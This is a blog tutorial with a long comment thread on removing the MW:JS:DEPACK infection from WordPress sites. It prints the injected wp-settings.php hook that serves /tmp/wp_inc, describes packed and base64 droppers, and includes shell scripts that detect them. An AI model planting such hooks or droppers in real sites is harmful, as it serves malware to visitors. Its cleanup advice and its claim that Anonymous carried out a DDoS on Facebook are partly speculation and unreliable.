Victor Ciobanu

Because every question deserves an answer

How to Remove MW:JS:DEPACK

by Victor Ciobanu

How to remove MW:JS:DEPACK malware.

If you are reading this, your WordPress site has been hit by a malware attack and has probably been flagged by Google as an unsafe site too. Check Google Webmaster Tools; this is what you will most likely find in its malware report:

What the scanner flags is packed (obfuscated) JavaScript, not Java: an eval(function(p,a,c,k,e,r){...}) wrapper. Unpacked, it looks like this:

Notice the link and the iframe. The actual URL varies from site to site. This is what you have to do to remove the malware:

0. If you are a pro/guru/gosu coder with Linux knowledge, skip to step 9; if not, continue reading.

1. Stop pulling your hair out trying to find the infected JavaScript (.js) file. Sometimes that really is all there is (only one .js file is infected and all you have to do is remove the code), but this malware has gotten smarter than that.

2. Use your favourite FTP client and navigate to your WordPress install root (in my case /opt/lampp/www/genericsite.com).

3. Sort the files by modification date and notice that your wp-settings.php file has been changed recently* (I will come back to how the file was changed).

4. Download the file, open it in a plain-text editor (WordPad or Notepad is fine, Word is not) and look for the following code:

function check_wordpress(){
$t_d = sys_get_temp_dir();            // the system temp folder, usually /tmp
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');           // print the payload into the page, unchanged
}
}
add_action('wp_head', 'check_wordpress');   // run it inside <head> on every page view

do_action( 'init' );   // this line is legitimate WordPress code; the injection sits just above it

5. Remove the injected code (keep the do_action( 'init' ); line, it belongs to WordPress), save, and upload the file to your server, overwriting the old one.

6. Open your site and view the source... the malware is gone.

7. Log in to Google Webmaster Tools and "Request a review".

8. Repeat these steps for every infected WordPress site and all should be fine. BUT wait!

* You only fixed the site; you did not eliminate the problem. The injected code above tells WordPress, on every page view, to look in the system's temporary folder (sys_get_temp_dir(), normally /tmp) for a file named wp_inc and to print its contents into the page header with readfile(). What does wp_inc contain? You guessed it: the malware code, the packed JavaScript and iframe from the top of this post. As long as that file exists, re-infecting a site takes one hook in one PHP file, and every WordPress install on the same server that carries the hook serves the same payload.

9. How do you remove the code and the file from the server? SSH into your machine (PuTTY on Windows, or whatever client you like best), become root (su) and run mc (Midnight Commander). If it is not installed, install it with your distribution's package manager (I use Mandriva, so urpmi mc; on Debian/Ubuntu it is apt-get install mc); there is no "wget mc".
Once in mc, go to the top level and choose Command => Find file => Filename: wp_inc. Let mc look for it; it will turn up in your /tmp folder (from a plain shell, find / -name wp_inc does the same). Edit the file (F4), delete the malware from it and save (F2).
(UPDATE 7 Nov: chmod it to 444, read-only. Left at 644 it got re-infected in my case. Treat this as a stopgap: whoever created wp_inc owns it, and a file's owner can always chmod it back, so 444 only holds against a writer running as some other unprivileged user. The real fix is to remove the hook from every wp-settings.php on the box and close the way the attacker is writing files, see below.)
And you are done! Pat yourself on the shoulder for being a super admin :P
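The whole procedure (steps 3, 4 and 9, plus the packed-JS check discussed in the comments) can be run from the SSH session of step 9 without Midnight Commander. The shell functions below are an added example by the editor, not code from this post: they locate the injected hook, list packed JavaScript files and recently modified files, and report whether wp_inc exists in the temp directory PHP would use. The sample site the script builds is a constructed fixture; the install path in the usage comment is an assumption.

```shell
#!/bin/sh
# Triage helpers for the wp_inc infection described in steps 1-9.
# Added example by the editor, not code from the post.  The sample site
# built by make_sample_site is a constructed fixture; the install path in
# the usage comment at the bottom is an assumption.

# Steps 3-4: PHP files carrying the injected hook, i.e. files that read a
# file named wp_inc out of sys_get_temp_dir().  Both strings must occur.
find_injected_hook() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if grep -q 'wp_inc' "$f" && grep -q 'sys_get_temp_dir' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# The packer stub the scanner flags (eval(function(p,a,c,k,e,r){...})).
# Legitimate minified libraries (jquery.*.pack.js) use the same packer, so
# treat hits as files to diff against a clean copy, not as proof.
find_packed_js() {
    find "$1" -type f -name '*.js' | while IFS= read -r f; do
        if grep -qF 'eval(function(p,a,c,k,e,' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Step 3 for the whole tree instead of one directory: files modified in
# the last N days.
recently_modified() {
    find "$1" -type f -mtime "-$2"
}

# Step 9: PHP's sys_get_temp_dir() honours $TMPDIR on Unix, so look in the
# directory PHP would use.  Prints "present <bytes>" or "absent".
tmp_marker() {
    t="${TMPDIR:-/tmp}/wp_inc"
    if [ -e "$t" ]; then
        printf 'present %s\n' "$(wc -c < "$t" | tr -d ' ')"
    else
        printf 'absent\n'
    fi
}

# Constructed fixture: a throw-away "WordPress root" holding one infected
# wp-settings.php, one packed .js file and two clean files.  Prints its path.
make_sample_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/t/js"
    cat > "$d/wp-settings.php" <<'EOF'
<?php
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );
EOF
    printf '<?php echo "clean"; ?>\n' > "$d/index.php"
    printf 'eval(function(p,a,c,k,e,r){return p}("x",1,1,[],0,{}))\n' \
        > "$d/wp-content/themes/t/js/packed.js"
    printf 'function ok(){ return 1; }\n' > "$d/wp-content/themes/t/js/clean.js"
    printf '%s\n' "$d"
}

# Usage on a real install (path assumed, as in step 2):
#   site=/opt/lampp/www/genericsite.com
#   find_injected_hook "$site"; find_packed_js "$site"
#   recently_modified "$site" 7; tmp_marker
```

Run it as root from the SSH session so that find can read every site on the box. The list from find_packed_js will include legitimately packed libraries, which is why the advice in this thread to compare each hit against a clean copy of the file still applies.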

*How did the server (and the WordPress install/installs) get infected?
The full answer is complicated, so here is the short one. It is one of two things:
a. Your PC is infected. Malware on the workstation picks up the FTP credentials that FileZilla (or whatever client you use) has saved or is using in an open session, and with that FTP access the attacker writes wp_inc into the tmp folder on your server and patches your wp-settings.php. The antivirus on the PC (AVG in my case) did not catch it; it is the stolen FTP login, not the antivirus, that does the damage.
b. You used a template/theme/script/PHP file downloaded from SCRIPTMAFIA.ORG and it was infected. I'm not saying pay TemplateMonster $50 for a theme, but when you download RIP'ed files from scriptmafia.org, have the decency to check the code out :)

(It's like having sex with a girl you just met... I'm not saying you shouldn't f**k her without taking her to an expensive restaurant first, meeting her parents and waiting for 3 weeks; I'm saying use a condom!)

If this was helpful or made you smile, please share it on Facebook / Twitter / etc. Thank you!

(Update, 9 November: who led the attack and what was the point? I'll try to keep it short.
The attack was led by a group called Anonymous and the target was Facebook, but Google stepped in and, in effect, protected Facebook by marking our sites as unsafe.
It was a DDoS-type attack and it worked as follows: our servers (sites) were infected; any visitor who accessed one of our sites on 5 November got an invisible iframe of a page that called Facebook's login API, but only at certain moments(!); so from Facebook's point of view all the visitors of all our websites tried to log in to Facebook in the same second, causing a denial of service.)


64 Comments

  1. Thanks so much dude :) Steps were perfect!!

    So glad this worked :) Have requested a review now.

    So I guess we should delete any temporary internet files now?

    And another question – can we not create a blank “wp_inc” file in that temp directory, giving it only read only permissions? So the same hack cannot happen again?

    Thanks again!

    • Glad I could help.
      Your idea is great, but keep in mind it would only fix this particular issue (other files in the /tmp folder could be infected and called upon by wp-settings), which brings me to my point: give read-only permissions (444) to the wp-settings* file after fixing it and see if it still gets infected (I did that; now I'm playing the waiting game :P).

      !!! *Remember you did this the next time you update your WordPress install, as the file will not get overwritten!

      • That's true! But since this is a widespread attack, I don't think we are getting individually victimised here, so I think it would be effective in blocking this particular attack for now, as that is the way the attack has been programmed.

        Would be effective until they change it that is.

        I just checked and the "wp_inc" file re-appeared here too, however the wp_settings.php file remained intact, so it wasn't being called anywhere, luckily.

        Google is taking long to review my site as it was flagged for malware :(

        I would really like to know how to protect from such an attack though.. I will admit I did download a scriptmafia template for testing purposes a year ago, but after I liked it I deleted the theme folder, and purchased the original one replacing all the contents.. So i don’t think it is related?

        And I do use AVG so could it be that? How did you find out about the AVG exploit by the way?

        Thanks again!

        • Imagine my frustration at having a client's ($$/CPC, AdWords) real-estate website blocked... for 9 hours now. Yes, Google is taking its sweet time reviewing this (but that does not stop them from charging $$ per click).

          About the AVG issue: AVG uses LinkScanner to show whether the SERPs found after a Google search are... "safe"; in order to do so it "injects" code into the page (client side only).

          The sh*t storm happens when you have an exploit running on your PC (malware) that is not detected by AVG, and that malware uses the injection algorithm of LinkScanner to rewrite pages (but also java files) on your site (provided, of course, you are logged in to your WordPress site as admin).

          So far (I have to admit I am an avid scriptmafia user, since I don't think I should pay just to evaluate a theme or plugin; I always pay, though, when I commercially deploy something, since the customer would take the blame for my wrongdoing) I have identified a lot of kinds of exploits, from .js alterations to new admins being created (be aware of those!!!) on my WordPress install to code dumped into the SQL database to god knows what added to a simple HTML file.

          • I totally agree with you about the evaluation there, which is what I did with my current theme. I would have been bummed if I had paid for some of the crap themes out there which I tested.

            But I deleted the whole theme folder and then uploaded the paid one once I bought it, so I really don't know what is causing this :(
            Also I've scanned for any suspicious base64 code (which they love) and nothing comes up? So I dunno??

            And I don’t use AVG’s LinkScanner feature either?

            Thanks

  2. Hey, nice tutorial. Thanks.

    By the way, How/Where can I make/buy the condom? Can I just share yours?? :P

    I did download some themes/plugins from websites, test to see the real functionality, do modifications of the designs, show the customers, and when they confirm the design and features, I buy the theme and plugins.

    If one day those commercial theme and plugin suppliers do provide some testing platform (with a secret URL, e.g. something like mywebdevelopmentprojects.com/clients/blabla), then the Internet could be a bit safer.

    Andy.

    • I agree Andy,

      You should pay for something only when it's commercially deployed; not before, just by looking at a pretty picture and taking their word for it that it does what you expect it to do.

      So yeah, a testing platform would be welcome, but I think it would decrease their income by 90%.

      About the condom issue... uhm... all I got is a RIP'ed version from scriptmafia... so if you are willing to give it a go, it's OK by me :))

  3. Fantastic article. I found I had this on my site and although I've cleaned up the settings.php file, I cannot seem to find the "wp_inc" or the temp directory on my server.

    Do I have to go through the "run MC (Midnight Commander)" and the install of "wget mc"? Can I not just search for it and delete it manually?

    Thank you – invaluable info!

    • Dear Zooty,
      as long as you have access to the /tmp folder you can edit it and change the permissions of wp_inc to 444.

      I would recommend against deleting it since that’s exactly what I did and 20 minutes later the file/malware was back in the tmp folder.

      Also keep in mind that if you run the server, your Linux tmp folder is infected (not the one in htdocs); if you use a 3rd-party hosting provider, the /tmp folder in your root is infected (not the one in /www or /www/yoursite.tld).

      This leads me to believe that the real issue is somewhere else (either the machine, the Linux server, has a virus or a script keeps dumping that file in the /tmp folder; or the Windows PC I use injects the code into wp-settings and puts a fresh copy of wp_inc there whenever I connect using FileZilla).

      I will investigate further and post the results, since this is really hurting me (I have over 30 WordPress installs on that particular server, most of them WP multi installs).

  4. Do you have any advice for Mac users? Sorry if this is a dumb question. I've never done this before.

    • Please be more specific: is your webserver a Mac, or is the station you are using a Mac?
      If your webserver is a Mac... I don't know really... look for the wp_inc file in the tmp folder and try to replace it with a blank one and change the file permissions to 444.
      If you use a Mac station, the steps are valid; the only thing is that the program you use to connect to FTP differs.

  5. Hey, I tried this and it did not work. Surici is still saying I have malware after I deleted the part of the code. I’ve already contacted my webhost but they have not replied yet.

  6. I meant sucuri, the site checker is still saying I have malware after the code was deleted.

    • Dear Phil,
      if you use WP Super Cache or some other cache plugin, remember to clear the cache/disable preload before running another check!

      If you can't find the code when looking in the source of the file and Sucuri can still find it, it means that Sucuri is getting an older (cached) file than the one you are looking at.
      Your webhost provider will not help... at best they will feed you some silly BS; at worst they will delete your site (true story).

  7. I still cannot seem to find the "wp_inc" or the temp directory on my server... is this something my server can provide access to (I'm on 1and1) or can I literally browse for it via FTP?

    Thank you in advance…as mentioned before, totally invaluable.

    • My problem is the same. I can't access how su. But, one question: can I comment out (/* */) the code instead of deleting it?

      • I would recommend deleting the code and chmod'ing wp-settings to 444 (but remember you did that, since an update will not overwrite that file!).

    • If you are 100% sure there is no wp_inc file in the tmp folder in your root (remember to force the FTP program to show hidden files; in FileZilla there is a Server menu with the option "Force showing hidden files"), send support a ticket telling them to clear the server's /tmp folder, as you fear it might be infected.

      chances are that the server has the malware in it’s main tmp folder (like my server did) and not on the tmp folder that cpanel creates for your account.

      hope this helps. also the chmod trick works like a charm.

  8. I removed the code from wp-settings and Sucuri cleared my site.
    I do have access to /temp
    Please suggest how to locate wp_inc in it.
    My host is bluehost.

    • As I fear that the server's /tmp folder (not the one on your account) is infected, I would suggest sending support a ticket asking them to delete the /tmp folder, as you fear there is a malware file there. They will get right on it. (Are you sure you can't locate the file in the /tmp folder? In my experience with them, I use them too, there is a tmp folder in the root but it doesn't show any files.)
      Remember to force FileZilla to show hidden files! (Server > Force showing hidden files)

  9. Hi! Thanks for this tutorial, but I can't find that code in wp-settings.php, and I don't know what else to do.

    • Chances are that only one .js file has the malware. Check each and every .js script file that your theme loads in the header and look for the code (packed ....(a,b,,,,,)). You will find it sure enough, since it stands out really easily.

  10. Not sure if anyone here is with 1and1, but I’ve sent them the following, will give you their reply….

    Dear 1and1,

    Do I have a /tmp folder on my Business server?

    Apparently there is an infected file in there which is having an effect on the majority of my WordPress websites.

    I keep getting a section of code put into my wp-settings.php file as follows…

    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . '/wp_inc')){
    readfile($t_d . '/wp_inc');
    }
    }
    add_action('wp_head', 'check_wordpress');

    This code infects my WordPress sites with Malware. When I delete the code, the websites are fine again but it keeps coming back.

    On careful inspection of the code (see above) it says there is a file called wp_inc which needs adjusting, but I can’t see it via FTP.

    Can you give me access to this /tmp folder? If not, could you change the wp_inc file permission to 444? This should stop it infecting my WordPress sites.

    I look forward to your reply.

  11. Ok, I have tried everything to repair this problem and I’m still having my site marked as dangerous.. webmaster tools keeps telling me this message: http://i42.tinypic.com/2d94c1y.jpg

    I changed the wp-settings.php with a brand new file, and it doesn't work, and I didn't find the code in the .js files.

    • hey !
      Checked your site. Your site still has malware. (DON'T REQUEST A REVIEW!)
      Here is an example of a js file that is infected: .geekometro.com/wp-content/plugins/easy-fancybox/fancybox/jquery.easing-1.3.pack.js?ver=1.3 Look for "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(…" and delete the section that has the malware, or replace it with a clean .js file.
      Remember to clear your cache after cleaning everything.

      This should fix everything!

  12. Excellent article!
    Helped me identify the problem.
    However, I can't find the wp_inc file on my file system.
    Any clues?
    Thanks

    • Hey Ant !
      Trust me on this one, there is a wp_inc on the system, but chances are that you are not allowed to see it (if it's a host provided to you by a hosting company, the file could be in the /tmp folder of the system and not in the tmp folder that cPanel creates for your account).
      If you run the server (have root privileges) use: find / -name 'wp_inc'
      to locate the file. Hope this helps a bit.

  13. Ok everyone, here is the response from 1and1…what do you think?

    Zooty.

    “Thank you for contacting us.

    There are two types of attack that can be made on a website. One is via FTP. In this particular case the malware was uploaded by FTP. The FTP access was gained through malware installed on your personal computer, that is, whatever machine you use to access 1&1's servers. The other is a PHP injection attack. A PHP injection attack most commonly happens when a website has a form, such as a guestbook, and code is passed to the server via the form. This will show up simply as a POST in the access logs. Typically these POSTs will show up from suspicious country IP addresses. One way to prevent these attacks is to make sure to keep your programs and scripts up to date. Check regularly for security warnings and make sure to install security patches as they become available. Also regularly update your 1&1 account password and FTP password.

    If you have any further questions please do not hesitate to contact us.


    Sincerely,
    Technical Support
    1&1 Internet Limited"

    • It is a good answer if you ask me :). To take things a bit further, the PHP injection attack is most likely to have caused this, since we probably had the infected files on our servers for some time, and on November 3 at 15:48 (local time, GMT+2) something (most likely someone) activated the attack.
      Besides updating FTP passwords regularly, I would also recommend checking your site source (client side) from time to time, since exploits like this are easy to spot (most of them are loaded into wp_head, so they show up in the first 100 lines of code).

      One of us (or a group) should develop a tool (and NOT charge $89 for it as Sucuri does) that would allow users to monitor their site's health status and email them as soon as something fishy is detected.
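The access-log check that the host's reply and the answer above point at can be scripted. The shell functions below are an added example by the editor, not code from this thread: they list POSTs to PHP files that are not normal WordPress write endpoints, grouped by client IP, and print the timestamp of the first such request to a given path. The log lines are constructed in the Apache/nginx combined format; the allow-list of legitimate POST endpoints is an assumption about a stock install and must be extended for plugins that accept POSTs.

```shell
#!/bin/sh
# Access-log triage for the "PHP injection" case the host describes:
# injected PHP is exercised with POST requests, so list POSTs to .php
# paths that are not normal WordPress write endpoints, grouped by client.
# Added example by the editor, not from the thread.  The log lines are
# constructed (combined log format); the allow-list is an assumption
# about a stock install and must be extended for plugins that take POSTs.

# Paths where a stock WordPress legitimately receives POSTs (awk regex).
WP_POST_OK='wp-login[.]php|wp-admin/|wp-comments-post[.]php|xmlrpc[.]php|wp-cron[.]php'

# Print "count ip path" for every POST to a .php path outside the
# allow-list, most frequent first.  $1 = log file.
suspicious_posts() {
    awk -v ok="$WP_POST_OK" '
        $6 == "\"POST" {
            path = $7; sub(/\?.*/, "", path)            # drop the query string
            if (path ~ /[.]php$/ && path !~ ok) print $1, path
        }' "$1" | sort | uniq -c | sort -rn | awk '{ print $1, $2, $3 }'
}

# Timestamp of the first POST to a given path, to bracket the moment the
# dropper was activated and to pick a backup from before it.  $1 = log,
# $2 = path without query string.  Prints nothing if there was no POST.
first_post_to() {
    awk -v p="$2" '
        $6 == "\"POST" {
            path = $7; sub(/\?.*/, "", path)
            if (path == p) { print substr($4, 2); exit }
        }' "$1"
}

# Constructed sample log: two POSTs to a theme file, normal login and
# admin-ajax traffic, and a GET/POST pair to a stray file in uploads.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [03/Nov/2011:15:48:02 +0200] "POST /wp-content/themes/t/footer.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2011:15:48:09 +0200] "POST /wp-content/themes/t/footer.php?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Nov/2011:16:02:11 +0200] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Nov/2011:16:02:40 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Nov/2011:16:10:00 +0200] "GET /wp-content/uploads/x.php HTTP/1.1" 200 10 "-" "curl/7.21"
192.0.2.9 - - [03/Nov/2011:16:10:05 +0200] "POST /wp-content/uploads/x.php HTTP/1.1" 200 10 "-" "curl/7.21"
EOF
    printf '%s\n' "$f"
}

# Usage on a real server (log path assumed):
#   suspicious_posts /var/log/apache2/access.log
#   first_post_to /var/log/apache2/access.log /wp-content/themes/t/footer.php
```

A POST to a theme file or to anything under wp-content/uploads has no legitimate reason on a stock install; those are the requests to match against the modification times found in step 3. The first timestamp also tells you which backup is still worth restoring.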

  14. Thank YOU beyond so much for this article! I am so tired of WP getting hacked, it's not even funny. This is the second attack on my site sheldontechnology.com in the last 90 days! WP seems very insecure.

  15. I've lost the sidebar widgets!
    I don't know, but on all the websites I've got infected I have lost all the sidebars.
    Enabling it in the admin area gives an error like the theme doesn't support sidebars!!!

    • Hey Sandro!
      Make sure you eliminated the cause first! (Check wp-settings, check the /tmp folder, look for wp_inc.)
      Your issue looks to be a bit more complicated. Check the state of your wp-settings file and upload a backup of that file (if you have one).

      If you don't have a backed-up wp-settings file, I would recommend backing up your database (SQL) and files, and uploading a fresh set of WordPress files over the old ones.

      In old WordPress installs the insertion of the malware (the call for wp_inc) into wp-settings broke that file. Updating your WordPress might help if that is the case (the sites that lost their sidebars are <3.0 WordPress installs).

      • Thanks for the info,
        updating WordPress fixed the problem; the sidebar is now back, the widgets are in position on some websites, only on one did I have to rebuild all the widgets.

  16. Done with the steps. Thanks! It seems cleared by Google too.

    I don't quite know if it's part of the malware, but a while back my site visitors suddenly spiked. Their IPs (with variations in the last octet) point to Mountain View, CA. I am guessing it was another attack.

    The sad thing about this attack is that all site pictures are gone and replaced with a 0 kB file with the same filename; part of the content is mostly missing!

    Is it just the TimThumb issue? Are there any security measures made or released by WordPress yet?

    • Hey Grace !
      About the Mountain View, CA traffic: that's not an attack, that's just Google (their HQ is in Mountain View, CA) indexing your site. Taking into account the number of different crawlers Google has now (image, meta, AdWords, AdSense, mobile, etc.), when they index your site you could interpret that as a flood, but trust me, it's not.
      To give you an example, I run a very high-traffic (and zero-income :P) TV show site. Whenever I post a new article, I get 30 bots crawling my content. Most of them are from Google (Mountain View, CA).
      Also check whether you increased your crawl rate setting in Webmaster Tools.

      About the image issue... I can't give you a straight answer yet, too many variables, but most likely it's not malware related.
      So far, no. WordPress did not release anything new related to this kind of attack. However, their guideline about running a secure site is somewhat useful.

  17. @Sandro: we've lost our sidebars too just a while back. We did some searching. To get it all back, just go to wp-settings.php and replace its contents with the contents of a clean WordPress wp-settings.php file.
    (ADMIN EDIT: I DO NOT RECOMMEND THIS! There are major DIFFERENCES between versions of that file in different releases of WordPress. Rather than doing this, overwrite the whole WordPress install with fresh, clean files.)
    Hope this helps.

    @admin: does the malware have anything to do with the code

    Searching the content of our .php files, we found that there are around 3000+ blank lines in the wp-config.php file and in the middle of it we found a script just like the one described here: .reinaris.nl/wp/delete-malware-warning-counter-wordpress-com/. Is this among the malware's behaviour or just a new malware altogether?

    • Edited your post.
      That is not among the behaviour I discovered for this exploit. However, it seems that this malware also affects java, so my advice would be to check the JS scripts that are called in your header (view source, click on the .js files and look for "packed" or "base64"; they are total giveaways for something fishy).

  18. @admin: no probs. Looking for solutions to this malware had us scouring sites all over the net with their users recommending this and that.

    Thanks for the advice! So far we've dealt with the files with "packed". Hopefully we'll be able to get back the original posts and pics.

  19. admin – some very interesting replies here.

    Can I just ask: if I alter the permissions on wp-settings.php to 444 (unwritable), can I still update my WordPress site or do I need to temporarily change it to 644 to make a change, then back to 444 when finished?

    If it works, it’s a bit of a pain but probably worth the hassle until a more permanent fix is found.

    Zooty.

    • You're spot on, it's a pain! You have to manually change the permission to 644, update, and then back to 444.
      Or, if you are able to locate wp_inc, change its permission to 444 after cleaning it.
      Both solutions are "patches", as it would be smarter to find the cause and eliminate it
      (either an injection script that resides on the server waiting to be called upon, harder to fix as you have to check each file or the logs,
      or FTP manipulation, an easy fix: just scan your station for malware/viruses etc.).
      So far (due to my pretty busy schedule) I've been unable to investigate the issue further.

  20. Thanks, this was really helpful!

    One problem. On step 9, I did a find -name wp_inc in shell and it couldn’t find the file. I also looked in /tmp and it’s not there. What am I doing wrong?

    • Please be more specific: you were able to find the file but you were not able to find where it's located? If that is the case, no problem... delete its contents and chmod it to 444 and you should be OK.

  21. I was able to remove the infection (or so I think) from my site, but now all my widgets are missing. When going into the config, the "Available Widgets" and "Inactive Widgets" are both blank. Any help is greatly appreciated!

  22. Just want to first say thank you so much for this post and information, it has really helped this complete computer fool work some of this out. However…

    I have reloaded the wp-settings.php file but the widgets section in WordPress is empty. I have followed the other instructions you pointed out above. Bluehost suggested I delete the tmp folder, which I did; they said it would automatically reinstall, which it did. They also removed the wp_inc file for me.

    But now I have all the random widgets down the sidebar with no means to change them. Also still waiting for Google to re-evaluate their warning.

    Any more help would be gladly appreciated.

    • Copy a fresh set of WordPress installation files over the old ones. That should fix it. Also read the rest of the comments; someone else had the same issue.

  23. Thank you for your post. I tried to follow your instructions but I cannot find any "function check_wordpress" in my wp-settings.php.
    I can see that my wp-settings and wp-config have been modified recently. Is there anything I can look for?? Thanks!

  24. There was entirely too much data to copy and move and then use new WordPress files. I went against the ADMIN's suggestion and just copied a new wp_settings.php file over from a new installation, and it worked. I was able to re-create the environment locally using the same database name, etc., and after setting that all up I copied the file. Seems to work fine. Is there any way to prevent this from happening again? Looks like it happened to quite a few people.

  25. Seem to have, for now at least, got rid of the malware, but the widgets page on my WordPress backend is still empty. I am already using WordPress 3.2.1. Any more advice would be appreciated.

    I am not sure what this means and how to do it: "I would recommend backing up your database (sql) and files, and uploading a fresh set of wordpress files over the old ones."

    Any other ideas? Thanks.

    • That means logging on to your cPanel, going to phpMyAdmin, selecting your database and exporting it. That file (SQL) is a hard copy of everything that is posted on your site and all the plugin config. It's a lifesaver if your host decides to delete your site.

  26. Hey!
    Thanks for this very efficient tutorial!
    Unfortunately, I’m a real dummy (^^) and I didn’t understand step 9.
    I downloaded PuTTY but I'm not working under a Linux environment, so I got lost...
    What would be the alternative for people working under a Windows environment?

    Moreover, I’m facing the same problem with the sidebars…
    What should I do?

    Thanks again for your help!

  27. Admin, your efforts and feedback are much appreciated. Cheers. All fixed. Touch wood.

  28. OK, I know it's a different piece of malware, but I just had two of my WordPress sites suffer from something altering the footer.php file in the theme folder.

    At the end of the code... there has been some malware inserted which starts with...
    <?php eval(gzuncompress(base64_decode followed by a lot of scrambled coding.

    My Kaspersky immediately picked it up when I visited both sites. I've removed it all now, but what got in and altered that file?

    Once again, I've made the footer.php file 444, but this is getting ridiculous. Can anyone offer any suggestions... WordPress is getting to be very insecure.

  29. Thank you for your reply. I found the code in my js files.

  30. I don’t find that code in my site’s wp-settings.php.
    Please check: denun.net

    All main index.php files in my hosting are infected. :(

    • I did; all I could find on that domain was the java exploit. This makes me think that your index.php was replaced.

  31. As per Sucuri my website is infected with MW:JS:DEPACK; however, there is nothing in my settings.php file, but the index.php file is infected with a long eval(base64_decode code.
    When I remove the bad code from index.php the site gets cleared, however after some time the bad code pops up again in index.php.
    How can I stop this from happening?
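Comments 17, 28 and 31 describe the same trick in three different files: an eval(base64_decode(...)) or eval(gzuncompress(base64_decode(...))) call, sometimes hidden behind thousands of blank lines so that it sits below the visible part of the editor window. The shell functions below are an added example by the editor, not code from this thread; they list every such call with its line number and measure the blank-line padding in front of it. The three files they build are constructed fixtures whose base64 strings decode to harmless text.

```shell
#!/bin/sh
# Find the obfuscated PHP droppers described in comments 17, 28 and 31:
# eval(base64_decode(...)), eval(gzuncompress(base64_decode(...))) and the
# "thousands of blank lines before the payload" padding.
# Added example by the editor, not code from the thread.  The files built
# by make_sample_tree are constructed fixtures with inert payload strings.

# Print "file:line" for every eval() fed by a decoder/decompressor.
# Looks at .php and .html (comment 1 mentions code added to plain HTML).
scan_php_markers() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) |
    while IFS= read -r f; do
        grep -nE 'eval[[:space:]]*\((base64_decode|gzuncompress|gzinflate|str_rot13)' "$f" |
            awk -F: -v f="$f" '{ print f ":" $1 }'
    done
}

# Length of the longest run of blank lines before the first eval( in a
# file: a large number means the payload was pushed below what a normal
# editor window shows.  Prints 0 when there is no eval( at all.
padding_before_eval() {
    awk '
        /^[ \t]*$/         { run++; if (run > maxrun) maxrun = run; next }
        index($0, "eval(") { print maxrun + 0; found = 1; exit }
                           { run = 0 }
        END                { if (!found) print 0 }' "$1"
}

# Constructed fixture: a theme footer with a gzuncompress/base64 stub, a
# wp-config.php with 3000 blank lines in front of an eval(base64_decode())
# call, and a clean index.php.  The base64 strings decode to "constructed".
make_sample_tree() {
    d=$(mktemp -d)
    printf '<?php /* theme footer */ ?>\n</body></html>\n<?php eval(gzuncompress(base64_decode("Y29uc3RydWN0ZWQ="))); ?>\n' \
        > "$d/footer.php"
    {
        printf '<?php\ndefine("DB_NAME", "wp");\n'
        awk 'BEGIN { for (i = 0; i < 3000; i++) print "" }'
        printf 'eval(base64_decode("Y29uc3RydWN0ZWQ="));\n'
        printf 'require_once "wp-settings.php";\n'
    } > "$d/wp-config.php"
    printf '<?php echo "clean"; ?>\n' > "$d/index.php"
    printf '%s\n' "$d"
}

# Usage on a real install (path assumed):
#   scan_php_markers /opt/lampp/www/genericsite.com
#   padding_before_eval /opt/lampp/www/genericsite.com/wp-config.php
```

A hit in wp-config.php, index.php or a theme's footer.php is almost never legitimate, and a padding count in the hundreds or thousands is the tell that somebody wanted the line to survive a casual look at the file. As with wp_inc, removing the line is not enough while whatever writes it still has access; the file will come back, as comment 31 reports.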

  32. Well, the MW:JS:DEPACK-infected files on my host are hidden somewhere else. I cannot find them in wp-settings.php. I have deleted many files with suspicious code and it still comes up. Is there a new modification?

    • You might have the wunderbar_emporium rootkit exploit somewhere in your site. My guess would be wp_includes. Check every folder there using FTP and look for anything suspicious (files that are not commonly found in a typical WP install).